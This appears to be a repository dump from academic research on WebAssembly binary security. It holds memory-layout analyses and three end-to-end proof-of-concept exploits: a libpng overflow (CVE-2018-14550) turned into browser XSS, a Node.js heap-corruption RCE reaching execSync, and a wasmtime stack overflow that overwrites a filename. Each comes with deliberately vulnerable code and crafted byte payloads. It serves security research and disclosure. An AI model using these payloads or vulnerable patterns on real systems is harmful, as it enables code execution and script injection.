199 |                                         # fallthrough-return-void
200 | 	end_function
201 | .Lfunc_end5:
202 | 	.size	dead_code, .Lfunc_end5-dead_code
203 |                                         # -- End function
204 | 	.type	.L.str.1,@object        # @.str.1
205 | 	.section	.rodata..L.str.1,"",@
206 | .L.str.1:
207 | 	.asciz	"argc: %d\nargv: %p\nargv[0]: %s\nargv[1]: %s\n"
208 | 	.size	.L.str.1, 43
209 | 
210 | 	.type	.L.str.2,@object        # @.str.2
211 | 	.section	.rodata..L.str.2,"",@
212 | .L.str.2:
213 | 	.asciz	"&func_ptr: %p\nfunc_ptr:  %p\n"
214 | 	.size	.L.str.2, 29
215 | 
216 | 	.type	.L.str.3,@object        # @.str.3
217 | 	.section	.rodata..L.str.3,"",@
218 | .L.str.3:
219 | 	.asciz	"aaaa"
220 | 	.size	.L.str.3, 5
221 | 
222 | 	.type	.L.str.4,@object        # @.str.4
223 | 	.section	.rodata..L.str.4,"",@
224 | .L.str.4:
225 | 	.asciz	"%p\n"
226 | 	.size	.L.str.4, 4
227 | 
228 | 	.type	.Lstr,@object           # @str
229 | 	.section	.rodata..Lstr,"",@
230 | .Lstr:
231 | 	.asciz	"evil called"
232 | 	.size	.Lstr, 12
233 | 
234 | 	.no_dead_strip	dead_code
235 | 
236 | 	.ident	"clang version 10.0.0 (/b/s/w/ir/cache/git/chromium.googlesource.com-external-github.com-llvm-llvm--project 12e915b3fcc55b8394dce3105a24c009e516d153)"
237 | 	.globaltype	__stack_pointer, i32
238 | 	.functype	strcpy (i32, i32) -> (i32)
239 | 	.functype	puts (i32) -> (i32)
240 | 	.functype	iprintf (i32, i32) -> (i32)
241 | 	.functype	getTempRet0 () -> (i32)
242 | 	.functype	setTempRet0 (i32) -> ()
243 | 	.size	__THREW__, 4
244 | 	.size	__threwValue, 4
245 | 	.section	.custom_section.producers,"",@
246 | 	.int8	1
247 | 	.int8	12
248 | 	.ascii	"processed-by"
249 | 	.int8	1
250 | 	.int8	5
251 | 	.ascii	"clang"
252 | 	.ascii	"\206\001"
253 | 	.ascii	"10.0.0 (/b/s/w/ir/cache/git/chromium.googlesource.com-external-github.com-llvm-llvm--project 12e915b3fcc55b8394dce3105a24c009e516d153)"
254 | 	.section	.rodata..Lstr,"",@
255 | 


--------------------------------------------------------------------------------
/compilers/get-versions.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Clang
 4 | # Download from https://github.com/CraneStation/wasi-sdk/releases
 5 | echo "Clang version and configured target"
 6 | wasi/wasi-sdk-8.0-linux/wasi-sdk-8.0/bin/clang --version
 7 | echo
 8 | 
 9 | # Rust
10 | # Install and/or update if not already done: https://github.com/CraneStation/wasi-sdk/releases
11 | # rustup update
12 | echo "Rust compiler version and installed targets:"
13 | rustc --version
14 | rustc +nightly --version
15 | rustup target list | grep wasm
16 | echo
17 | 
18 | # Emscripten
19 | # Install and/or update if not already done
20 | # mkdir -p emcc-upstream emcc-fastcomp
21 | # pushd emcc-upstream
22 | # git clone https://github.com/emscripten-core/emsdk.git
23 | # cd emsdk
24 | # git pull
25 | # ./emsdk install latest
26 | # ./emsdk activate latest
27 | # popd
28 | 
29 | # pushd emcc-fastcomp
30 | # git clone https://github.com/emscripten-core/emsdk.git
31 | # cd emsdk
32 | # git pull
33 | # ./emsdk install latest-fastcomp
34 | # ./emsdk activate latest-fastcomp
35 | # popd
36 | 
37 | echo "Emscripten compiler version (upstream and fastcomp backend)"
38 | source ./emcc-upstream/emsdk/emsdk_env.sh > /dev/null
39 | emcc --version | grep emcc
40 | 


--------------------------------------------------------------------------------
/compilers/versions.txt:
--------------------------------------------------------------------------------
 1 | - emscripten, installed with emsdk on 2020-02-05
 2 |     * emcc --version: 1.39.7
 3 |     * ./emsdk install latest: upstream llvm backend
 4 |     * ./emsdk install latest-fastcomp: legacy fastcomp backend
 5 | - clang, installed from wasi-sdk on 2020-01-09
 6 |     * ./wasi-sdk-8.0-linux/wasi-sdk-8.0/bin/clang --version: 9.0.0
 7 | - rustc, installed via rustup, update from 2020-01-30
 8 |     * rustc --version: 1.41.0 (5e1a79984 2020-01-27)
 9 |     * rustc +nightly --version: 1.43.0-nightly (c9290dcee 2020-02-04)
10 |     * wasm32-wasi backend
11 |     * wasm32-unknown-emscripten backend
12 | 


--------------------------------------------------------------------------------
/end-to-end-exploits/browser-libpng-xss/00-compile-libpng-native/.gitignore:
--------------------------------------------------------------------------------
1 | /libpng-1.6.35/
2 | 


--------------------------------------------------------------------------------
/end-to-end-exploits/browser-libpng-xss/00-compile-libpng-native/libpng-1.6.35.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/end-to-end-exploits/browser-libpng-xss/00-compile-libpng-native/libpng-1.6.35.zip


--------------------------------------------------------------------------------
/end-to-end-exploits/browser-libpng-xss/01-reproduce-overflow-native-detected/input-ssp-detected:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/end-to-end-exploits/browser-libpng-xss/01-reproduce-overflow-native-detected/pnm2png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/end-to-end-exploits/browser-libpng-xss/01-reproduce-overflow-native-detected/pnm2png


--------------------------------------------------------------------------------
/end-to-end-exploits/browser-libpng-xss/02-compile-pnm2png-wasm/.gitignore:
--------------------------------------------------------------------------------
1 | /libpng-1.6.35/
2 | 


--------------------------------------------------------------------------------
/end-to-end-exploits/browser-libpng-xss/02-compile-pnm2png-wasm/build.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | rm -r libpng-1.6.35 main.wasm main.js out/main.js out/main.wasm
3 | unzip -q libpng-1.6.35.zip
4 | 
5 | source ../../../compilers/emcc-upstream/emsdk/emsdk_env.sh
6 | emcc --bind -O2 main.cpp -o out/main.js -std=c++11 -s USE_LIBPNG=1 -s ALLOW_MEMORY_GROWTH=1 -s "EXTRA_EXPORTED_RUNTIME_METHODS=['ccall']"
7 | 
8 | ./server.py


--------------------------------------------------------------------------------
/end-to-end-exploits/browser-libpng-xss/02-compile-pnm2png-wasm/inputs/exploit:
--------------------------------------------------------------------------------
1 | AAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGHHHHHHHHHHHHyou&nbsp;gor&nbsp;pwned<script>alert("XSS!")</script><!--
2 | 
3 | Note 3 things:
4 | 1. fill with garbage until we get to heap location, where img_tag string data is stored (128 bytes)
5 | 2. very interesting: gor (in the exploit file) becomes got in the DOM: the code for some reason increments this value twice and thus changes the ASCII character from r -> t
6 | 3. badchars: \t, \n, and space, that's why we use &nbsp;


--------------------------------------------------------------------------------
/end-to-end-exploits/browser-libpng-xss/02-compile-pnm2png-wasm/inputs/monarch.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/end-to-end-exploits/browser-libpng-xss/02-compile-pnm2png-wasm/inputs/monarch.png


--------------------------------------------------------------------------------
/end-to-end-exploits/browser-libpng-xss/02-compile-pnm2png-wasm/inputs/monarch.pnm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/end-to-end-exploits/browser-libpng-xss/02-compile-pnm2png-wasm/inputs/monarch.pnm


--------------------------------------------------------------------------------
/end-to-end-exploits/browser-libpng-xss/02-compile-pnm2png-wasm/inputs/small.ppm:
--------------------------------------------------------------------------------
 1 | P3
 2 | 3 2
 3 | 255
 4 | # The part above is the header
 5 | # "P3" means this is a RGB color image in ASCII
 6 | # "3 2" is the width and height of the image in pixels
 7 | # "255" is the maximum value for each color
 8 | # The part below is image data: RGB triplets
 9 | 255   0   0  # red
10 |   0 255   0  # green
11 |   0   0 255  # blue
12 | 255 255   0  # yellow
13 | 255 255 255  # white
14 |   0   0   0  # black


--------------------------------------------------------------------------------
/end-to-end-exploits/browser-libpng-xss/02-compile-pnm2png-wasm/main.cpp:
--------------------------------------------------------------------------------
 1 | #include <string>
 2 | 
 3 | #include <emscripten.h>
 4 | #include <emscripten/val.h>
 5 | 
 6 | #include "libpng-1.6.35/contrib/pngminus/pnm2png.c"
 7 | 
 8 | // Small wrapper around pnm2png that opens and closes the input and output files.
 9 | void convert(const char * input_filename, const char * output_filename) {
10 |     FILE* input = fopen(input_filename, "rb");
11 |     FILE* output = fopen(output_filename, "wb");
12 | 
13 |     pnm2png(input, output, NULL, FALSE, FALSE);
14 | 
15 |     fclose(input);
16 |     fclose(output);
17 | }
18 | 
19 | // Using browser methods (implemented natively, so should be faster) to read virtual file to base64 string.
20 | std::string file_to_base64(std::string filename) {
21 |   return (char*) EM_ASM_INT({
22 |     const arrayBuffer = FS.readFile(UTF8ToString($0));
23 |     // See https://stackoverflow.com/questions/9267899/arraybuffer-to-base64-encoded-string
24 |     const base64 = btoa([].reduce.call(new Uint8Array(arrayBuffer),function(p,c){return p+String.fromCharCode(c)},""));
25 |     return allocateUTF8(base64);
26 |   }, filename.c_str());
27 | }
28 | 
29 | // Shorten to make code below a bit easier to read for paper.
30 | typedef emscripten::val emcc;
31 | 
32 | EMSCRIPTEN_KEEPALIVE
33 | extern "C"
34 | void convert_and_preview() {
35 |   // Stack-based buffer overflow in pnm2png() overwrites this string on the heap.
36 |   std::string img_tag = "<img src='data:image/png;base64,";
37 |   
38 |   // Call existing C library (which has vulnerability CVE-2018-14550).
39 |   convert("input.pnm", "output.png");
40 | 
41 |   // Append base64 data URL containing the PNG data to img tag.
42 |   img_tag += file_to_base64("output.png") + "'>";
43 | 
44 |   // Use emscripten JavaScript bindings to call document.write() and add image tag to DOM.
45 |   emcc::global("document").call<void>("write", img_tag);
46 | }
47 | 


--------------------------------------------------------------------------------
/end-to-end-exploits/browser-libpng-xss/02-compile-pnm2png-wasm/out/main.html:
--------------------------------------------------------------------------------
 1 | <!doctype html>
 2 | <html lang="en">
 3 | 
 4 | <head>
 5 |     <meta charset="utf-8">
 6 |     <title>Vulnerable WebAssembly Application: Client-Side Image Conversion</title>
 7 | </head>
 8 | 
 9 | <body>
10 |     Select input <a href="https://en.wikipedia.org/wiki/Netpbm#File_formats">PNM file</a> to convert and show:
11 |     <input type="file" onchange="uploadFile()">
12 |     <script>
13 |         // Do not run main() function in WebAssemblz binary.
14 |         var Module = { "noInitialRun": true };
15 | 
16 |         function uploadFile() {
17 |             // Get uploaded file as typed array view.
18 |             const file = document.querySelector("input[type=file]").files[0];
19 |             file.arrayBuffer().then(buffer => {
20 |                 const typedArray = new Uint8Array(buffer);
21 |                 // Pass via emscripten's virtual in-memory filesystem.
22 |                 FS.writeFile("input.pnm", typedArray);
23 |                 // Call exported C function (which converts the PNM file to PNG and shows it).
24 |                 Module.ccall("convert_and_preview");
25 |             });
26 |         }
27 |     </script>
28 |     <script src="main.js"></script>
29 | </body>
30 | 
31 | </html>


--------------------------------------------------------------------------------
/end-to-end-exploits/browser-libpng-xss/02-compile-pnm2png-wasm/out/main.wasm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/end-to-end-exploits/browser-libpng-xss/02-compile-pnm2png-wasm/out/main.wasm


--------------------------------------------------------------------------------
/end-to-end-exploits/browser-libpng-xss/02-compile-pnm2png-wasm/screenshots/before.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/end-to-end-exploits/browser-libpng-xss/02-compile-pnm2png-wasm/screenshots/before.png


--------------------------------------------------------------------------------
/end-to-end-exploits/browser-libpng-xss/02-compile-pnm2png-wasm/screenshots/benign.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/end-to-end-exploits/browser-libpng-xss/02-compile-pnm2png-wasm/screenshots/benign.png


--------------------------------------------------------------------------------
/end-to-end-exploits/browser-libpng-xss/02-compile-pnm2png-wasm/screenshots/exploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/end-to-end-exploits/browser-libpng-xss/02-compile-pnm2png-wasm/screenshots/exploit.png


--------------------------------------------------------------------------------
/end-to-end-exploits/browser-libpng-xss/02-compile-pnm2png-wasm/server.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #
 3 | # Small web server that serves
 4 | # pocketsphinx.wasm with the
 5 | # correct MIME type
 6 | #
 7 | 
 8 | import SimpleHTTPServer
 9 | import SocketServer
10 | 
11 | PORT = 8000
12 | 
13 | Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
14 | 
15 | Handler.extensions_map['.wasm'] = 'application/wasm'
16 | httpd = SocketServer.TCPServer(("", PORT), Handler)
17 | 
18 | print("serving at port {}".format(PORT))
19 | 
20 | httpd.serve_forever()
21 | 


--------------------------------------------------------------------------------
/end-to-end-exploits/browser-libpng-xss/02-compile-pnm2png-wasm/simplified.cpp:
--------------------------------------------------------------------------------
1 | void main() {
2 |   std::string img_tag = "<img src='data:image/png;base64,";
3 |   pnm2png("input.pnm", "output.png");  // CVE-2018-14550
4 |   img_tag += file_to_base64("output.png") + "'>";
5 |   emcc::global("document").call("write", img_tag);
6 | }
7 | 


--------------------------------------------------------------------------------
/end-to-end-exploits/browser-libpng-xss/CVE-2018-14550:
--------------------------------------------------------------------------------
1 | https://github.com/glennrp/libpng/issues/246


--------------------------------------------------------------------------------
/end-to-end-exploits/browser-libpng-xss/valid-input.pbm:
--------------------------------------------------------------------------------
 1 | P1
 2 | # This is an example bitmap of the letter "J"
 3 | 6 10
 4 | 0 0 0 0 1 0
 5 | 0 0 0 0 1 0
 6 | 0 0 0 0 1 0
 7 | 0 0 0 0 1 0
 8 | 0 0 0 0 1 0
 9 | 0 0 0 0 1 0
10 | 1 0 0 0 1 0
11 | 0 1 1 1 0 0
12 | 0 0 0 0 0 0
13 | 0 0 0 0 0 0


--------------------------------------------------------------------------------
/end-to-end-exploits/node-js-rce/build.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # needs gnu99 for gets()
 3 | emcc -std=gnu99 -g -O2 main.c -o main.js -s MALLOC=emmalloc -s NODERAWFS=1; wasm2wat --generate-names main.wasm > main.wat
 4 | wasm2wat --generate-names main.wasm > main.wat
 5 | # x: must be valid "op", otherwise program terminates
 6 | # 7 bytes of padding, here: spaces
 7 | # gksudo\x00\x00: string to be passed to exec
 8 | # \x18\x00\x00\x00: hex 18 (dec 24) size of our own region, corresponds to the 16 bytes in the malloc() call (8 bytes metadata)
 9 | # \x10\x00\x00\x00: hex 10 (dec 16) size of fake free region
10 | # \x01\x00\x00\x00: free list prev entry, here: value to write
11 | # \x98\x19\x50\x00: free list next entry, here: ptr to write to -4
12 | # \xEF\xFF\xFF\xFF: one's complement of fake free region size, was 10, so complement of 10
13 | echo -ne 'x       gksudo\x00\x00\x18\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x98\x19\x50\x00\xEF\xFF\xFF\xFF' > exploit
14 | # offset of gksudo string in injected heap data
15 | echo 5249632 > gksudo-offset
16 | cat gksudo-offset | node main.js


--------------------------------------------------------------------------------
/end-to-end-exploits/node-js-rce/exploit:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/end-to-end-exploits/node-js-rce/exploit


--------------------------------------------------------------------------------
/end-to-end-exploits/node-js-rce/gksudo-offset:
--------------------------------------------------------------------------------
1 | 5249632
2 | 


--------------------------------------------------------------------------------
/end-to-end-exploits/node-js-rce/main.c:
--------------------------------------------------------------------------------
 1 | #include<emscripten.h>
 2 | #include<stdio.h>
 3 | #include<stdlib.h>
 4 | #include<string.h>
 5 | #include<wchar.h>
 6 | 
 7 | void exec(const char * cmd) {
 8 |     EM_ASM({
 9 |         require("child_process").execSync(UTF8ToString($0))
10 |     }, cmd);
11 | }
12 | 
13 | void print_hex(int i) {
14 |     printf("%x\n", i);
15 | }
16 | 
17 | void print_dec(int i) {
18 |     printf("%d\n", i);
19 | }
20 | 
21 | int main() {
22 | 
23 |     // forces exec to be in the function table
24 |     printf("&exec: %p\n", &exec);
25 | 
26 |     void (*fptr)(int);
27 | 
28 |     char * op = malloc(16);
29 |     char * arg = malloc(16);
30 | 
31 |     FILE * f = fopen("exploit", "rb");
32 |     fgets (op, 40, f);
33 | 
34 |     if (op[0] == 'x') {
35 |         fptr = &print_hex;
36 |     } else if (op[0] == 'd') {
37 |         fptr = &print_dec;
38 |     } else {
39 |         exit(1);
40 |     }
41 | 
42 |     for (size_t* i = (size_t*) (op-40); i < (size_t*) (op+100); i++)
43 |         printf("%p %zx\n", i, *i);
44 | 
45 |     // force fptr to be in linear memory because we take its address
46 |     printf("fptr: %p @ %p \n", fptr, &fptr);
47 | 
48 |     free(op);
49 | 
50 |     for (size_t* i = (size_t*) (op-40); i < (size_t*) (op+100); i++)
51 |         printf("%p %zx\n", i, *i);
52 | 
53 |     // force fptr to be in linear memory because we take its address
54 |     printf("fptr: %p @ %p \n", fptr, &fptr);
55 | 
56 |     gets(arg);
57 | 
58 |     fptr(atoi(arg));
59 | }
60 | 
61 | 


--------------------------------------------------------------------------------
/end-to-end-exploits/node-js-rce/main.wasm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/end-to-end-exploits/node-js-rce/main.wasm


--------------------------------------------------------------------------------
/end-to-end-exploits/wasmtime-constant-file/build.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # NOTE for the exploit to work, the constant data has to be put _above_ the stack
 4 | # linker option: -Wl,-stack-first
 5 | wasi/wasi-sdk-8.0-linux/wasi-sdk-8.0/bin/clang --sysroot wasi/wasi-sysroot-8.0/wasi-sysroot -O2 -Wl,--stack-first vuln.c -o vuln.wasm
 6 | 
 7 | 
 8 | for wasm in *.wasm
 9 | do
10 |     echo "$wasm"
11 |     wasm2wat --generate-names "$wasm" > "$wasm.wat"
12 |     wasm-objdump -xh "$wasm" > "$wasm.objdump"
13 | done
14 | 


--------------------------------------------------------------------------------
/end-to-end-exploits/wasmtime-constant-file/danger:
--------------------------------------------------------------------------------
1 | echo 'This is dangerous :-('


--------------------------------------------------------------------------------
/end-to-end-exploits/wasmtime-constant-file/exploit.txt:
--------------------------------------------------------------------------------
1 | echo -e "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBdanger\x00\x00\x00w\x00echo 'This is dangerous :-('" | wasmtime --dir=. vuln.wasm
2 | 
3 | fill buffer (32 bytes): 32 x A
4 | fill other data until constant filename (22 bytes): BBBBBBBBBBBBBBBBBBBBBB
5 | filename (6 bytes + 1 NULL byte): danger\x00
6 | fill up space until 2nd argument of file(), write flag: "\x00\x00"
7 | file 2nd argument (write flag + NULL byte): w\x00
8 | 27 bytes payload available (that is the length of the original string): "echo 'this is dangerous :('"
9 | I don't know why, bad " " is a bad byte!?


--------------------------------------------------------------------------------
/end-to-end-exploits/wasmtime-constant-file/file.txt:
--------------------------------------------------------------------------------
1 | Write constant text to file.


--------------------------------------------------------------------------------
/end-to-end-exploits/wasmtime-constant-file/vuln.c:
--------------------------------------------------------------------------------
 1 | #include<stdio.h>
 2 | #include<stdlib.h>
 3 | 
 4 | __attribute__((noinline))
 5 | void stack_based_buffer_overflow() {
 6 |     char buf[32];
 7 |     scanf("%[^\n]", buf);
 8 |     puts(buf);
 9 | }
10 | 
11 | __attribute__((noinline))
12 | void write_file() {
13 |     FILE *f = fopen("file.txt", "w");
14 |     if (f == NULL) {
15 |         printf("Error opening file.\n");
16 |         exit(1);
17 |     }
18 |     fprintf(f, "Write constant text to file.");
19 |     fclose(f);
20 | }
21 | 
22 | int main() {
23 |     stack_based_buffer_overflow();
24 |     write_file();
25 |     return 0;
26 | }
27 | 
28 | 


--------------------------------------------------------------------------------
/end-to-end-exploits/wasmtime-constant-file/vuln.native:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/end-to-end-exploits/wasmtime-constant-file/vuln.native


--------------------------------------------------------------------------------
/end-to-end-exploits/wasmtime-constant-file/vuln.s:
--------------------------------------------------------------------------------
  1 | 	.text
  2 | 	.file	"vuln.c"
  3 | 	.globl	stack_based_buffer_overflow # -- Begin function stack_based_buffer_overflow
  4 | 	.p2align	4, 0x90
  5 | 	.type	stack_based_buffer_overflow,@function
  6 | stack_based_buffer_overflow:            # @stack_based_buffer_overflow
  7 | 	.cfi_startproc
  8 | # %bb.0:
  9 | 	pushq	%rbx
 10 | 	.cfi_def_cfa_offset 16
 11 | 	subq	$32, %rsp
 12 | 	.cfi_def_cfa_offset 48
 13 | 	.cfi_offset %rbx, -16
 14 | 	movq	%rsp, %rbx
 15 | 	movl	$.L.str, %edi
 16 | 	xorl	%eax, %eax
 17 | 	movq	%rbx, %rsi
 18 | 	callq	__isoc99_scanf
 19 | 	movq	%rbx, %rdi
 20 | 	callq	puts
 21 | 	addq	$32, %rsp
 22 | 	popq	%rbx
 23 | 	retq
 24 | .Lfunc_end0:
 25 | 	.size	stack_based_buffer_overflow, .Lfunc_end0-stack_based_buffer_overflow
 26 | 	.cfi_endproc
 27 |                                         # -- End function
 28 | 	.globl	write_file              # -- Begin function write_file
 29 | 	.p2align	4, 0x90
 30 | 	.type	write_file,@function
 31 | write_file:                             # @write_file
 32 | 	.cfi_startproc
 33 | # %bb.0:
 34 | 	pushq	%rbx
 35 | 	.cfi_def_cfa_offset 16
 36 | 	.cfi_offset %rbx, -16
 37 | 	movl	$.L.str.1, %edi
 38 | 	movl	$.L.str.2, %esi
 39 | 	callq	fopen
 40 | 	movq	%rax, %rbx
 41 | 	testq	%rbx, %rbx
 42 | 	je	.LBB1_1
 43 | # %bb.2:
 44 | 	movl	$.L.str.4, %edi
 45 | 	movl	$28, %esi
 46 | 	movl	$1, %edx
 47 | 	movq	%rbx, %rcx
 48 | 	callq	fwrite
 49 | 	movq	%rbx, %rdi
 50 | 	popq	%rbx
 51 | 	jmp	fclose                  # TAILCALL
 52 | .LBB1_1:
 53 | 	movl	$.Lstr, %edi
 54 | 	callq	puts
 55 | 	movl	$1, %edi
 56 | 	callq	exit
 57 | .Lfunc_end1:
 58 | 	.size	write_file, .Lfunc_end1-write_file
 59 | 	.cfi_endproc
 60 |                                         # -- End function
 61 | 	.globl	main                    # -- Begin function main
 62 | 	.p2align	4, 0x90
 63 | 	.type	main,@function
 64 | main:                                   # @main
 65 | 	.cfi_startproc
 66 | # %bb.0:
 67 | 	pushq	%rax
 68 | 	.cfi_def_cfa_offset 16
 69 | 	callq	stack_based_buffer_overflow
 70 | 	callq	write_file
 71 | 	xorl	%eax, %eax
 72 | 	popq	%rcx
 73 | 	retq
 74 | .Lfunc_end2:
 75 | 	.size	main, .Lfunc_end2-main
 76 | 	.cfi_endproc
 77 |                                         # -- End function
 78 | 	.type	.L.str,@object          # @.str
 79 | 	.section	.rodata.str1.1,"aMS",@progbits,1
 80 | .L.str:
 81 | 	.asciz	"%[^\n]"
 82 | 	.size	.L.str, 6
 83 | 
 84 | 	.type	.L.str.1,@object        # @.str.1
 85 | .L.str.1:
 86 | 	.asciz	"file.txt"
 87 | 	.size	.L.str.1, 9
 88 | 
 89 | 	.type	.L.str.2,@object        # @.str.2
 90 | .L.str.2:
 91 | 	.asciz	"w"
 92 | 	.size	.L.str.2, 2
 93 | 
 94 | 	.type	.L.str.4,@object        # @.str.4
 95 | .L.str.4:
 96 | 	.asciz	"Write constant text to file."
 97 | 	.size	.L.str.4, 29
 98 | 
 99 | 	.type	.Lstr,@object           # @str
100 | 	.section	.rodata.str1.16,"aMS",@progbits,1
101 | 	.p2align	4
102 | .Lstr:
103 | 	.asciz	"Error opening file."
104 | 	.size	.Lstr, 20
105 | 
106 | 
107 | 	.ident	"clang version 6.0.0-1ubuntu2 (tags/RELEASE_600/final)"
108 | 	.section	".note.GNU-stack","",@progbits
109 | 


--------------------------------------------------------------------------------
/end-to-end-exploits/wasmtime-constant-file/vuln.wasm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/end-to-end-exploits/wasmtime-constant-file/vuln.wasm


--------------------------------------------------------------------------------
/linear-memory-analysis/build.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Clang wasi
 4 | compilers/wasi/wasi-sdk-8.0-linux/wasi-sdk-8.0/bin/clang --sysroot compilers/wasi/wasi-sysroot-8.0/wasi-sysroot main.c -O2 -o clang-wasi.wasm
 5 | 
 6 | compilers/wasi/wasi-sdk-8.0-linux/wasi-sdk-8.0/bin/clang --sysroot compilers/wasi/wasi-sysroot-8.0/wasi-sysroot main.c -O2 -Wl,--stack-first -o clang-stack-first-wasi.wasm
 7 | 
 8 | 
 9 | # Emscripten
10 | compilers//emcc-upstream/emsdk/emsdk activate latest > /dev/null
11 | . compilers//emcc-upstream/emsdk/emsdk_env.sh > /dev/null
12 | which emcc
13 | emcc main.c -O2 -o emcc-upstream.js
14 | 
15 | compilers//emcc-fastcomp/emsdk/emsdk activate latest-fastcomp > /dev/null
16 | . compilers//emcc-fastcomp/emsdk/emsdk_env.sh > /dev/null
17 | which emcc
18 | emcc main.c -O2 -o emcc-fastcomp.js
19 | 
20 | 
21 | # Rust
22 | rustc --target=wasm32-wasi main.rs -O -o rust-wasi.wasm
23 | # rustc --target=wasm32-unknown-emscripten main.rs -O -o rust-emscripten.wasm
24 | 
25 | 
26 | # Binary information
27 | for wasm in *.wasm
28 | do
29 |     echo "$wasm"
30 |     wasm2wat --generate-names "$wasm" > "$wasm.wat"
31 |     wasm-objdump -xh "$wasm" > "$wasm.objdump"
32 |     rg 'global \$g\d+' "$wasm.wat" | cat
33 |     rg 'data.*global const' "$wasm.wat" | cut -c-100
34 | done
35 | 
36 | 
37 | # Dynamic information
38 | for js in emcc-*.js
39 | do
40 |     echo "$js"
41 |     node "$js" | tee "$js.stdout"
42 | done
43 | for wasm in *-wasi.wasm
44 | do
45 |     echo "$wasm"
46 |     wasmtime "$wasm" | tee "$wasm.stdout"
47 | done
48 | 


--------------------------------------------------------------------------------
/linear-memory-analysis/clang-stack-first-wasi.wasm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/linear-memory-analysis/clang-stack-first-wasi.wasm


--------------------------------------------------------------------------------
/linear-memory-analysis/clang-stack-first-wasi.wasm.stdout:
--------------------------------------------------------------------------------
 1 |   in main()
 2 |   in intermediate()
 3 |   in leaf()
 4 |     global const string, addr: 0x10000 (65536)
 5 |     stack-allocated (local) string, addr: 0xffa0 (65440)
 6 |     stack value in leaf() function, addr: 0xff9c (65436)
 7 |     stack grows: -4
 8 |     dynamically (heap) allocated string, addr: 0x200d0 (131280)
 9 |     argv[0]: clang-stack-first-wasi.wasm, addr: 0x200a0 (131232)
10 | 


--------------------------------------------------------------------------------
/linear-memory-analysis/clang-wasi-stack-first.wasm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/linear-memory-analysis/clang-wasi-stack-first.wasm


--------------------------------------------------------------------------------
/linear-memory-analysis/clang-wasi.wasm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/linear-memory-analysis/clang-wasi.wasm


--------------------------------------------------------------------------------
/linear-memory-analysis/clang-wasi.wasm.stdout:
--------------------------------------------------------------------------------
 1 |   in main()
 2 |   in intermediate()
 3 |   in leaf()
 4 |     global const string, addr: 0x400 (1024)
 5 |     stack-allocated (local) string, addr: 0x11510 (70928)
 6 |     stack value in leaf() function, addr: 0x1150c (70924)
 7 |     stack grows: -4
 8 |     dynamically (heap) allocated string, addr: 0x200d0 (131280)
 9 |     argv[0]: clang-wasi.wasm, addr: 0x200a0 (131232)
10 | 


--------------------------------------------------------------------------------
/linear-memory-analysis/emcc-fastcomp.js.stdout:
--------------------------------------------------------------------------------
 1 |   in main()
 2 |   in intermediate()
 3 |   in leaf()
 4 |     global const string, addr: 0x75c (1884)
 5 |     stack-allocated (local) string, addr: 0x1420 (5152)
 6 |     stack value in leaf() function, addr: 0x14ac (5292)
 7 |     stack grows: 140
 8 |     dynamically (heap) allocated string, addr: 0x5013b8 (5247928)
 9 |     argv[0]: /mnt/Data/Documents/SOLA/WebAssembly/security/evaluations/memory-layout/emcc-fastcomp.js, addr: 0x13c0 (5056)
10 | 


--------------------------------------------------------------------------------
/linear-memory-analysis/emcc-fastcomp.wasm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/linear-memory-analysis/emcc-fastcomp.wasm


--------------------------------------------------------------------------------
/linear-memory-analysis/emcc-fastcomp.wasm.objdump:
--------------------------------------------------------------------------------
  1 | 
  2 | emcc-fastcomp.wasm:	file format wasm 0x1
  3 | 
  4 | Sections:
  5 | 
  6 |      Type start=0x0000000a end=0x00000078 (size=0x0000006e) count: 16
